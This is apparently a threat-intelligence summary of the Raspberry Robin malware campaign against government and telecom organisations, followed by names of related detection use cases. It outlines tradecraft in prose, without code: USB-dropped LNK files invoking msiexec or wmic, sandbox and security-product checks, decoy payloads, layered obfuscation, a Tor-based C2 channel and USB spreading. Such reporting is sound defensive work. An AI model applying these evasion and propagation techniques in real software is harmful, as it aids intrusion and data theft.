Raspberry Robin Adding Layers of Deception
Category: Malware Campaign | Industries: Government, Telecommunications | Level: Tactical | Source: Trend Micro
Researchers from Trend Micro observed new infection routines from Raspberry Robin when the malware compromised organizations in late September. During these attacks, the malware carefully avoided detection through the use of fake payloads deceiving security products and attempting to hide the real payload packed under a heavy layer of obfuscation. Trend Micro researchers surmise Raspberry Robin is being deployed to support cyber-espionage and data theft objectives. Any stolen credentials can be sold to other cybercriminals on darknet forums. Many victims of this campaign have been government agencies and telecommunication organizations located in Latin America, Australia, Mexico, Croatia, and Italy.
Infections with Raspberry Robin often begin with a malicious USB drive dropping an LNK file to call msiexec or wmic to download and install the malware within a Windows Installer (MSI) package. Through a system check, the malware seeks to identify if the infected host is using a security solution or virtual machine. If so, the loader will drop a fake payload to derail analysis efforts from the malware's real infection routine. The fake payload will finish with an adware named 'BrowserAssistant,' to deceive analysts into believing it's the final payload.
If the system check did not identify the malware to be running in a VM or the host to have a security solution installed the real Raspberry Robin malware will be executed. "The real payload is made up of three layers, with the third layer containing the actual payload binary packed twice. Within the real payload is an embedded custom Tor client designed to communicate with the real payload using shared memory." Prior to communicating with the attacker’s command and control (C2), the malware will query the Windows registry to gather information about the system and establish persistence to survive reboots. To spread further, Raspberry Robin will copy itself to any attached USB drive to spread onto other hosts.
- Raspberry Robin Abuses MsiExec
Anvilogic Use Cases:
- MSIExec Install MSI File
- WinRM Tools
- Query Registry